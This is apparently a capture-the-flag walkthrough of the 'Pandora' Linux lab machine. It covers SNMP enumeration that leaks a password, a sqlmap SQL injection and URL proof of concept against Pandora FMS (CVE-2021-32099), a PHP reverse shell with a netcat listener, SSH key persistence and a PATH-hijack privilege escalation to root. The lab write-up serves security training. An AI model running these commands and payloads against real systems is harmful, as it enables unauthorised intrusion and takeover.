PANDORA (Linux) Walkthrough

assets/Pasted image 20220321125358.png


Let’s do a Quick Scan of the target using NMAP.

nmap -sV -sC -O -oA nmap/initial
  • -sC : run Default Nmap scripts
  • -sV : detects service versions
  • -O : detects OS
  • -oA : output all formats and store in file *nmap/initial

We got the following result …

  • PORT 22 : running SSH (OpenSSH 8.2p1)
  • PORT 80 : running HTTP (Apache httpd 2.4.41)
└─# nmap -sC -sV -O -oA nmap/initial
Starting Nmap 7.92 ( ) at 2022-03-21 05:26 EDT
Nmap scan report for
Host is up (0.35s latency).
Not shown: 998 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
|   256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_  256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see ).
TCP/IP fingerprint:

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 46.27 seconds

Let’s do a Full machine scan to make sure we are not skipping any ports or services on uncommon ports.

Running a UDP Scan …

nmap -sU -O -vvv -Pn

Found a interesting UDP Open Port.

  • PORT 161 : running SNMP.
└─# nmap -sU -O -vvv -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( ) at 2022-03-21 14:17 EDT
Initiating UDP Scan at 14:17
Scanning panda.htb ( [1000 ports]
UDP Scan Timing: About 15.50% done; ETC: 14:20 (0:02:49 remaining)
UDP Scan Timing: About 30.00% done; ETC: 14:20 (0:02:22 remaining)
UDP Scan Timing: About 45.00% done; ETC: 14:20 (0:01:51 remaining)
Stats: 0:06:44 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 29.65% done; ETC: 14:39 (0:15:59 remaining)
Stats: 0:06:45 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
Discovered open port 161/udp on
Completed UDP Scan at 14:49, 1916.09s elapsed (1000 total ports)
Initiating OS detection (try #1) against panda.htb (
Retrying OS detection (try #2) against panda.htb (
Nmap scan report for panda.htb (
Host is up, received user-set (0.35s latency).
Scanned at 2022-03-21 14:17:04 EDT for 1918s
Not shown: 913 closed udp ports (port-unreach)
PORT      STATE         SERVICE        REASON
22/udp    open|filtered ssh            no-response
53/udp    open|filtered domain         no-response
88/udp    open|filtered kerberos-sec   no-response
139/udp   open|filtered netbios-ssn    no-response
161/udp   open          snmp           udp-response ttl 63
217/udp   open|filtered dbase          no-response
445/udp   open|filtered microsoft-ds   no-response
464/udp   open|filtered kpasswd5       no-response
689/udp   open|filtered nmap           no-response
776/udp   open|filtered wpages         no-response
786/udp   open|filtered concert        no-response
959/udp   open|filtered unknown        no-response
996/udp   open|filtered vsinet         no-response
997/udp   open|filtered maitrd         no-response
1058/udp  open|filtered nim            no-response
1059/udp  open|filtered nimreg         no-response
1068/udp  open|filtered instl_bootc    no-response
1080/udp  open|filtered socks          no-response
1718/udp  open|filtered h225gatedisc   no-response
1885/udp  open|filtered vrtstrapserver no-response
2160/udp  open|filtered apc-2160       no-response
5355/udp  open|filtered llmnr          no-response
5555/udp  open|filtered rplay          no-response
5632/udp  open|filtered pcanywherestat no-response
9370/udp  open|filtered unknown        no-response
10080/udp open|filtered amanda         no-response
21847/udp open|filtered netspeak-cs    no-response
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:

Network Distance: 2 hops

Read data files from: /usr/bin/../share/nmap
OS detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 1918.49 seconds
           Raw packets sent: 2843 (132.437KB) | Rcvd: 1450 (299.306KB)

Running Nmap Scripts on the UDP Port we found earlier.

└─# nmap --script snmp-brute -vvv -p 161 -sU -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( ) at 2022-03-22 12:21 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 12:21
Completed NSE at 12:21, 0.00s elapsed
Initiating UDP Scan at 12:21
Scanning panda.htb ( [1 port]
Discovered open port 161/udp on
Completed UDP Scan at 12:21, 0.44s elapsed (1 total ports)
NSE: Script scanning
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 12:21
Completed NSE at 12:22, 12.76s elapsed
Nmap scan report for panda.htb (
Host is up, received user-set (0.41s latency).
Scanned at 2022-03-22 12:21:47 EDT for 13s

161/udp open  snmp    udp-response ttl 63
| snmp-brute: 
|_  public - Valid credentials

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 12:22
Completed NSE at 12:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds
           Raw packets sent: 2 (149B) | Rcvd: 1 (139B)

Tried Full machine scan as well, Didn’t found anything interesting.

nmap -sV -sC -O -p- -oA nmap/full

Its time to enumerate further.


During Recon process We found 3 ports Open 2 TCP (22,80), and one UDP (161). We can enumerate Port 22 but that won’t give us large attack surface. So its a better choice to Enumerate Port 80 and 161.

Let’s Enumerate Port 80 first.


Port 80 is running apache server.

assets/Pasted image 20220327064249.png

Manually browsing around the site did not found anything interesting. Tried to bruteforce the directories that too didn’t gave anything interesting. Did nikto scan as well , and checked for the apache version if any known vulnerabilities exists. But none of these worked out. So decided to Enumerate on UDP Port 161.

PORT 161 (UDP)

Tried to run nmap snmp scripts and got some interesting results.

nmap --script snmp-brute -vvv -p 161 -sU -Pn
161/udp open  snmp    udp-response ttl 63
| snmp-brute: 
|_  public - Valid credentials

Found out that the public was the valid credentials. So we can use snmp-check or snmpwalk to enumerate further.



snmpwalk -v 2c -c public | grep daniel

snmp-check gave us some interesting results, it provided us the list of running processes. Out of these running processes , Found a interesting process command which leaked the daniel user credentials.

assets/Pasted image 20220325005957.png

Daniel User Credentials …

username: daniel
password: HotelBabylon23

We can use these credentials to login as Daniel using ssh. So let’s do that.

Gaining a Foothold

As we already have the Daniel User Credentials , Let’s login using SSH

username: daniel
password: HotelBabylon23

We successfully logged in as Daniel user. Looking around the system , Figured out that there was one more account matt and one root account.

assets/Pasted image 20220327073028.png

Fired up linpeas as daniel user , and Found out that port 80 was running on the machine and also machine was vulnerable to PWNKIT and other privilege escalation vulnerabilities.

assets/Pasted image 20220327073844.png

I tried the PWNKIT Exploit, and it worked out and directly gave us root access along with the user and root flags, But i think it was not the intended way of getting the root access.


assets/Pasted image 20220327074404.png

So i continued.

From the linpeas result , Found that the local port 80 was running.

assets/Pasted image 20220327074649.png

Did a curl request and found out that this port is running some different service other than the one which we were able to found using nmap scan.

assets/Pasted image 20220327074914.png

Do further enumerate the http service , we have to port forward the target port 80 to attacker machine, Let’s use SSH to do so.

ssh -L 8080: [email protected] -N -f
  • -f : Requests ssh to go to background just before command execution.
  • -N : Do not execute a remote command. This is used for just forwarding ports.
  • -L : Specifies that connections to the given TCP port or Unix socket on the local (client) host are to be forwarded to the given host and port, or Unix socket, on the remote side.

We are now able to access the in attacker machine.

assets/Pasted image 20220327080347.png

Let’s browse the website and try to figure out if we can exploit it somehow to gain access to the root or matt user account.

assets/Pasted image 20220327080631.png

Running whatweb against the url …

└─# whatweb [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[], Meta-Refresh-Redirect[/pandora_console/] [200 OK] Apache[2.4.41], Cookies[PHPSESSID,errormsg], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[], JQuery[3.3.1], Meta-Author[Ártica ST], Pandora-FMS, PasswordField[pass], Script[javascript,text/javascript], Title[Pandora FMS - the Flexible Monitoring System]

It is running Pandora-FMS v7.0NG.742_FIX_PERL2020 , Googling around the version figured out that this version was vulnerable to CVE-2021-32099 (Unauthenticated SQL Injection).

assets/Pasted image 20220327082335.png

assets/Pasted image 20220327083910.png

From the references we found the blog containing the details to exploit the vulnerability to gain admin access.

assets/Pasted image 20220325014342.png

From the blog we found out that the session_id parameter in chart_generator.php file was vulnerable to sql injection. Let’s fireup the sqlmap and dump the data , that we can further use to gain admin or higher privilege user access.

sqlmap -u "http://localhost:8080/pandora_console/include/chart_generator.php?session_id=test" -p session_id --dbs

We found pandora daatabase, Let’s list out all the tables of this database.

sqlmap -u "http://localhost:8080/pandora_console/include/chart_generator.php?session_id=test" -p session_id --dbms=mysql -D pandora --tables

Out of many tables we found, tsessions_php table seems intersting as it may be possibly contains the all logged in sessions data.

sqlmap -u "http://localhost:8080/pandora_console/include/chart_generator.php?session_id=test" -p session_id --dbms=mysql -D pandora -T tsessions_php --dump

Out of many session data , One interesting session data we found was of admin. Let’s Put the session data into cookies (Use cookie manager)

assets/Pasted image 20220325052220.png


Refresh the login page and we should be now able to login as admin account.


We can also use this POC to directly get the admin login access.,2,%27id_usuario%7Cs:5:%22admin%22;%27%20as%20data%20--%20SgGO

Access the above url and then access the login page , You should have logged in as admin user.

Going through the monitoring Dashboard and its functionality figured out that we can upload php files through Admin-Tools > File-Manager , by creating a new file and uploading a PHP reverse shell.

We are able to upload the php-reverse-shell , But we don’t know the exact location of the upload directory, So let’s bruteforce the /pandora_console directory using gobuster.

└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -u -t 100 -x php,html,jpg,txt --no-tls-validation -q
/tools                (Status: 301) [Size: 329] [-->]
/index.php            (Status: 200) [Size: 13859]                                                 
/images               (Status: 301) [Size: 330] [-->]
/general              (Status: 301) [Size: 331] [-->]
/mobile               (Status: 301) [Size: 330] [-->] 
/tests                (Status: 301) [Size: 329] [-->]  
/ajax.php             (Status: 200) [Size: 3211]                                                    
/ws.php               (Status: 302) [Size: 0] [-->] 
/include              (Status: 301) [Size: 331] [-->]
/vendor               (Status: 301) [Size: 330] [-->] 
/extras               (Status: 301) [Size: 330] [-->] 
/extensions           (Status: 301) [Size: 334] [-->]

Out of all these directories we found, I found the /images directory where everything was located that was being upload through dashboard.

As we found the location of reverse shell , Let’s run a netcat listener and get the connection.


We received the connection on Netcat.

nc -lnvp 4444

assets/Pasted image 20220327091204.png

We got the shell as matt user, Now we are able to grab the user flag.

assets/Pasted image 20220327091320.png

We can’t access the root flag, So we need to escalate privilege.

Privilege Escalation

Let’s run the Linpeash to find some possible Privilege escalation vectors.

From the linpeas result , We found an interesting file /usr/bin/pandora_backup. This file is owned by root and allowed to run as root by matt user.

assets/Pasted image 20220327093131.png

Running file command to figure out the file type.

file /usr/bin/pandora_backup

assets/Pasted image 20220327094534.png

Let’s check the content of the file using cat.

cat /usr/bin/pandora_backup

assets/Pasted image 20220327094952.png

During execution file is running tar command without specifying the specific file path, We can try to exploit it. Read more here.

Before exploiting the PATH environment, Let’s get a stable SSH shell by adding the public keys to authorized_keys in /home/matt/.ssh/authorized_keys file.

└─# cat                                                        1 ⚙
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDP5yAYA9hwJ8a5MUF8DpWVtz0B08CwGT75h1ZIBSsys7AfZVO7X34oE8MFvs/DP3Cb87llpqkPu/QN+EcSCJIWaxWXWmS6uRVqDWnT/9pZlKSA/ZeqOS2nzBzazRJjRKiYUJ1EWrb8YE+aPpvOP2AbrMI55VLR8AyCBcaXBjAKFZX8Our0DLvopA1WATdHF5Dz8HM/FmT+pXpsOuCopP2xJLBnobIv4Upc1DyWQx/HTCpcJvz9nJ/G2aOBhL99CNajqVtDDJYxddyrUwCoXQTbPgyrAMMS+29uPplnOfD1u7zb6EroUmSD1ISnF8aYf6YOFm11Xg/nhTw8ZggXFnHfLPat4K8BED0OfqUhw8gCGn7UT3nBR5S83S4nq9wV3xsefDJidv1iLevEYFW7d1IpoRpzzizyUzTeWLViUiLC7Nq4krFnh4VrG0c2wF9gJ0/llfPUb17hph6UatekRYf4tvRVZ6kly5t/F7UtV0l78ixTa6Ehca85KA1rdJkPo+U= root@kali

Adding this public key to authorized_keys.

Note : Make sure to set authorized_keys file permission to 600 and .ssh directory permission to 700.

Login to target machine as matt user using ssh. Let’s exploit the pandora_backup executable to launch a shell as root user. As tar is used to extract something from /root . But the absolute tar path is not used , So we can create a tar file and Hijack the PATH to obtain root.

assets/Pasted image 20220327103546.png

We created a local file with contents “/bin/bash” , and append the Current directory Path to the PATH env variable and run the Binary and we get the root access.

Let’s Grab the Root Flag.

assets/Pasted image 20220327103632.png

Thank You For Reading